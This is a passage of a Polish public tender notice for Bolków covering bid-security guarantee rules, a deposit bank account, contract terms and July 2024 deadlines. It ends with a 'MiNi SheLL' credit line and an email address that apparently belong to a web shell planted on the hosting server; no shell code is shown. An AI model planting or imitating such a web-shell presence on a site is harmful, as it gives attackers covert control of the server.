gwarancyjnego do gwaranta. <br/>4.	W przypadku wniesienia wadium w formie gwarancji lub poręczenia, koniecznym jest, aby gwarancja lub poręczenie obejmowały: <br/>1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib, <br/>2)	kwotę gwarancji, <br/>3)	termin ważności gwarancji w formule: „od dnia ………… - do dnia…………&#34;, <br/>4)	odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp. <br/>5)	nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium płatne na pierwsze pisemne żądanie Zamawiającego, <br/>6)	sposób przesłania żądania zapłaty, z podaniem adresu poczty elektronicznej, na który zostanie przesłane wezwanie żądania zapłaty oraz terminu na dostarczenie żądania nie później niż do 3 dni po upływie terminu ważności wadium (forma pisemna lub forma elektroniczna opatrzona kwalifikowanym podpisem elektronicznym pod rygorem nieważności). <br/>5.	Wierzytelność z tytułu gwarancji/poręczenia nie może być przedmiotem przelewu na rzecz osoby trzeciej. <br/>6.	Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć taką samą płynność jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w tej formie nie może być utrudnione. Dlatego w treści gwarancji powinna znaleźć się klauzula stanowiąca, iż wszystkie spory odnośnie gwarancji będą rozstrzygane zgodnie z prawem polskim i poddane jurysdykcji sądów polskich, chyba, że wynika to z przepisów prawa. <br/>7.	Wadium w formie pieniądza należy wnieść przelewem na konto Banku Spółdzielczego w Jaworze ul. Wrocławska 2, 59-400 Jawor nr rachunku: 84 8647 1059 0400 0518 2004 0005. Na poleceniu przelewu należy wpisać: &#34;Wadium w sprawie ID.271.22.2023&#34;. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian określony został w paragrafie 10 wzoru umowy załączonego do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-30 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.platformazakupowa.pl/pn/bolkow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-30 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com